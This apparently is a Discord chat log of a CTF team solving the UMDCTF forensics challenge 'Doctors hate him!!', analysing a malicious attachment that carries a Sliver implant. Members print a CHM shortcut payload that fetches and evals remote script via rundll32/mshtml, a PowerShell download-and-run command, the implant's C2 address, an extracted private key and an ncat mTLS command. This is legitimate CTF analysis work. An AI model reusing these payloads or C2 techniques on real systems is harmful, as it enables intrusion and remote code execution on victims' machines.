Project Sekai - ✅-forensics-doctors-hate-him

Doctors hate him!! - 500 points

Category: Forensics Description: Someone sent me this in an email... ad targeting is hitting a little too close here smh... Author: birch Files:

https://umdctf.io/files/d50a78ce5adb88f76f88ea964c766b0d/Doctors-Hate-Him.zip?token=eyJ1c2VyX2lkIjoxNDcsInRlYW1faWQiOjY4LCJmaWxlX2lkIjo3N30.ZE2kBg.cms2VGRnqlBbwRAQRXLZdFf9D8Q

Tags: No tags.

Sutx pinned a message to this channel. 04/29/2023 4:11 PM

has malware

sahuang pinned a message to this channel. 04/29/2023 4:13 PM

@Legoclones wants to collaborate

@Violin wants to collaborate

@afterworld wants to collaborate

UMDCTF{1997_called_

isnt the chall down?

18:37

they are fixing attachment

o ok makes so much sense lmao

oh

cuz theres no malware

18:38

      <PARAM name="Command" value="ShortCut">
      <PARAM name="Button" value="Bitmap::shortcut">
      <PARAM name="Item1" value=',cmd.exe

18:38

they forgot to add second half lmfao

18:38

  <PARAM name="Command" value="ShortCut">
  <PARAM name="Button" value="Bitmap::shortcut">
  <PARAM name="Item1" value=',cmd.exe,/c copy /Y C:\Windows\system32\rundll32.exe %TEMP%\out.exe > nul && %TEMP%\out.exe javascript:"\..\mshtml RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://127.0.0.1:8000/test.vbs",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im out.exe",0,true);}'>
  <PARAM name="Item2" value="273,1,1">

18:38

should be some shit like this

back

@TheBadGod wants to collaborate

Invoke-WebRequest -Uri http://dns-server.online:6969/explore.exe -OutFile explore.exe; Start-Process explore.exe; ='gurl_jnag_gurve'

23:27

Hm, it looks like that file might've been a virus. Instead of cooking up trouble, try cooking up a Slow-Cooked Pulled Pork Sliders: https://www.foodnetwork.com/recipes/food-network-kitchens/slow-cooker-pulled-pork-sandwiches-recipe.html

discord moment

well you have the url

23:28

download my super cool virus: http://dns-server.online:6969/explore.exe

23:28

thanks discord

afterworld

UMDCTF{1997_called_

and yeah this is inside again too

23:31

go binary has a bunch of obfuscated strings

uuuh

sub_D0E2E0 is https://github.com/BishopFox/sliver/blob/ee6decb64b160c4185a7413cf37cceaf570d014c/implant/sliver/sliver.go#L161

sliver/sliver.go at ee6decb64b160c4185a7413cf37cceaf570d014c · Bish...

Adversary Emulation Framework. Contribute to BishopFox/sliver development by creating an account on GitHub.

mtls://dns-server.online:8888

b'-----BEGIN CERTIFICATE-----\nMIIBXzCCAQSgAwIBAgIQH9x7feWfbEF7t/GcIcdShzAKBggqhkjOPQQDAjAAMB4X\nDTIzMDEzMTIwMjkzN1oXDTI1MDEzMDIwMjkzN1owGDEWMBQGA1UEAwwNQ09NSU5H\nX0hBVFJFRDBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABDMi/PM0fOIHxa280PLE\neD/zlfQDYOl3AXeKoHsxFezozFBHmL88pJvTzFw081aFvshtAIPqP4ZItwJNgB1V\nZNajSDBGMA4GA1UdDwEB/wQEAwIFoDATBgNVHSUEDDAKBggrBgEFBQcDAjAfBgNV\nHSMEGDAWgBT7ysU8Eb0RsVSGoiZkRkAIOpM0RTAKBggqhkjOPQQDAgNJADBGAiEA\n2HcBjemOfXyJ5IJiIc9baUc9vwgFrbWbrs9YpZWniGACIQCzv6z9lBX7QLIdJBWu\nOzRDbbC+G2q7/QWzv1QkqDW+Qg==\n-----END CERTIFICATE-----\n'

ca cert:

b'-----BEGIN CERTIFICATE-----\nMIIBcDCCARWgAwIBAgIQaRLyNwPkM1kYCyy1TCg9XDAKBggqhkjOPQQDAjAAMB4X\nDTIzMDQwNjIwMDkxMFoXDTI1MDQwNTIwMDkxMFowADBZMBMGByqGSM49AgEGCCqG\nSM49AwEHA0IABP9NZgJAEXF2+caqhLdUI2QE+Lz4JjHDM+WCAsYwwUEe1JSd3FDB\nPo1c76+Jkew/aZmeQin4KnlmHa2mP1E/RlujcTBvMA4GA1UdDwEB/wQEAwICpDAd\nBgNVHSUEFjAUBggrBgEFBQcDAQYIKwYBBQUHAwIwDwYDVR0TAQH/BAUwAwEB/zAd\nBgNVHQ4EFgQUqCIGoaQq7EgLj7N1BoN9Jtj/TecwDgYDVR0RAQH/BAQwAoIAMAoG\nCCqGSM49BAMCA0kAMEYCIQCvyV7B6msvVJKQm9WJQAGBlrTOmpZlmEba3IWnSIqa\nxQIhAIhwur6UysB4vHEZD3j0etQSeN+W2c99DIGXfyPnlV3f\n-----END CERTIFICATE-----\n'

b'-----BEGIN EC PRIVATE KEY-----\nMHcCAQEEIAbbnT+PnFckLFhmUs0Gxlg4IBaaX1F/ImCKW3eyDi78oAoGCCqGSM49\nAwEHoUQDQgAEMyL88zR84gfFrbzQ8sR4P/OV9ANg6XcBd4qgezEV7OjMUEeYvzyk\nm9PMXDTzVoW+yG0Ag+o/hki3Ak2AHVVk1g==\n-----END EC PRIVATE KEY-----\n'

01:45

a.crt

538 bytes

ca.crt

558 bytes

priv.key

227 bytes

01:46

now what

02:00

well

02:00

unfortunate

wut, chal down?

seems like it

02:04

unless the flag is hidden somewhere else

ah ok

also it might be that I crashed it

02:04

whatd you do

made an http request to the sliver server

TheBadGod

Click to see attachment 🖼️

but yeah using ncat and these certs we should be able to just open a normal tcp connection

02:05

and then idk? get flag? somehow? maybe?

first solver did it in 20min after new file is up, kinda unsure if they just found this endpoint or its somewhere else

probably just ran the file in a sandbox?

ah could be

TheBadGod

but yeah using ncat and these certs we should be able to just open a normal tcp connection

command should look something like this ncat --ssl --ssl-cert client.crt --ssl-key client.key --ssl-trustfile server.crt dns-server.online 8888 (edited)

@deuterium wants to collaborate

02:22

@deuterium left you alone, what a chicken!

chal seems back?

mmmh, still getting connection refused, so might be hidden in the binary?

@crazyman ai wants to collaborate

i try to scan memory but nothing

06:21

striped golang

06:21

........

06:21

i hate it

it uses https://github.com/BishopFox/sliver/blob/ee6decb64b160c4185a7413cf37cceaf570d014c/implant/sliver/sliver.go

sliver/sliver.go at ee6decb64b160c4185a7413cf37cceaf570d014c · Bish...

Adversary Emulation Framework. Contribute to BishopFox/sliver development by creating an account on GitHub.

TheBadGod

Click to see attachment 🖼️

private client keys (edited)

TheBadGod

mtls://dns-server.online:8888

uses mtls

06:22

but server is down rn, but other teams solve it, so probably hidden somewhere else (Or i got banned from the server for connecting once)

Invoke-WebRequest -Uri http://dns-server.online:6969/explore.exe -OutFile explore.exe; Start-Process explore.exe; ='gurl_jnag_gurve'

06:45

imports r stripped in binary (edited)

yes, that's the binary I analyzed and got the keys from

06:47

author just replied to my ticket that everything's working, and that I should not overthink it

ah

Subject: CN = COMING_HATRED

06:49

that looks weird

TheBadGod

Subject: CN = COMING_HATRED

wheres this?

in the client.crt (a.crt) I sent

yeah hm

06:57

what is this string, anything significant

06:57

gurl_jnag_gurve

they_want_their

06:57

rot13

2nd part of the flag?

seems like it

06:59

UMDCTF{1997_called_they_want_their

So just looking for end?

probably ..._back}?

Yeah

so we need a _ starting str (edited)

07:02

u think theres stego in that pokemon image?

Anything hidden in certs?

TheBadGod

Subject: CN = COMING_HATRED

07:03

the CN of the client cert

07:03

but does not make sense

Hmm

U2xpdmVyIHJlYWxseSBkb2VzIHNvdW5kIGxpa2UgYSBwb2tlbW9uLi4uIGFueXdheXMgcGV3IHBldyEgUGFydCAzOiBfbWFsd2FyZV9iYWNrX2Jvem99

07:08

_malware_back_bozo

NICE

07:08

where

TheBadGod

used /ctf solve

✅ Challenge solved.

http://dns-server.online:6969/